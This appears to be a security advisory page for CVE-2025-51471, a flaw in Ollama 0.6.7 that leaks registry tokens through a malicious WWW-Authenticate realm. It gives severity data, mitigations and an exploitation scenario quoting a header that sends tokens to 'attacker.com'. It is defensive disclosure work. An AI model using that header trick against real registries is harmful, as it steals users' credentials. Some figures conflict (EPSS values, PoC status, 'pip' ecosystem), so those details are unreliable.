CVE-2025-51471 — MEDIUM (CVSS 6.9) AI Security Vulnerability

CISO Take

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.

Risk Assessment

Effective risk is moderate-to-high in enterprise AI environments despite the medium CVSS score. The AC:H and UI:R modifiers reflect that exploitation requires a malicious registry interaction, but in practice many teams pull models ad-hoc from community sources, making social-engineering the pull trivial. The scope change (S:C) and C:H impact are the critical signals: a stolen registry token can pivot to private model repositories, exposing proprietary fine-tuned models or access to broader MLOps infrastructure. No public PoC exploitation observed and not in CISA KEV, but the gecko.security writeup lowers the bar significantly.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
ollama	pip	—	No patch
170.6K 1.4K dependents Pushed 6d ago 5% patched ~0d to patch Full package profile →

Do you use ollama? You're affected.

Severity & Risk

CVSS 3.1

6.9 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 7% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC High

PR None

UI Required

S Changed

C High

I Low

A None

Recommended Action

5 steps

PATCH

Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750).
RESTRICT

Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries.
AUDIT

Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs.
ISOLATE

Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials.
DETECT

Alert on Ollama processes making authentication requests to domains not matching your approved registry list.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Auth Bypass Data Extraction Supply Chain Inference API Model AML.T0010.003 - Model AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0091.000 - Application Access Token AML.T0106 - Exploitation for Credential Access

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

6.1.2 - AI risk assessment 8.4 - AI system operation and monitoring

NIST AI RMF

GOVERN-1.1 - Policies for AI risk management MANAGE-2.2 - Risk treatment for AI system vulnerabilities

OWASP LLM Top 10

LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-51471?

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.

Is CVE-2025-51471 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-51471, increasing the risk of exploitation.

How to fix CVE-2025-51471?

1. PATCH: Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750). 2. RESTRICT: Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries. 3. AUDIT: Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs. 4. ISOLATE: Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials. 5. DETECT: Alert on Ollama processes making authentication requests to domains not matching your approved registry list.

What systems are affected by CVE-2025-51471?

This vulnerability affects the following AI/ML architecture patterns: LLM inference (Ollama self-hosted), Model serving infrastructure, CI/CD model delivery pipelines, MLOps automation (automated model pulls), Local AI development environments.

What is the CVSS score for CVE-2025-51471?

CVE-2025-51471 has a CVSS v3.1 base score of 6.9 (MEDIUM). The EPSS exploitation probability is 0.03%.

Technical Details

NVD Description

Cross-Domain Token Exposure in server.auth.getAuthorizationToken in Ollama 0.6.7 allows remote attackers to steal authentication tokens and bypass access controls via a malicious realm value in a WWW-Authenticate header returned by the /api/pull endpoint.

Exploitation Scenario

An adversary registers a namespace on a public model hub or stands up a malicious Ollama-compatible registry. They socially engineer a developer or automate a pull via a poisoned model reference (e.g., in a requirements file, LLMOps config, or CI workflow). When Ollama calls /api/pull, the malicious registry responds with WWW-Authenticate: Bearer realm='https://attacker.com/token'. Ollama's getAuthorizationToken follows the realm URL without domain validation and forwards the user's authentication credentials. The attacker captures the token and uses it to authenticate to the victim's legitimate private model registry, exfiltrating proprietary fine-tuned models or injecting poisoned replacements.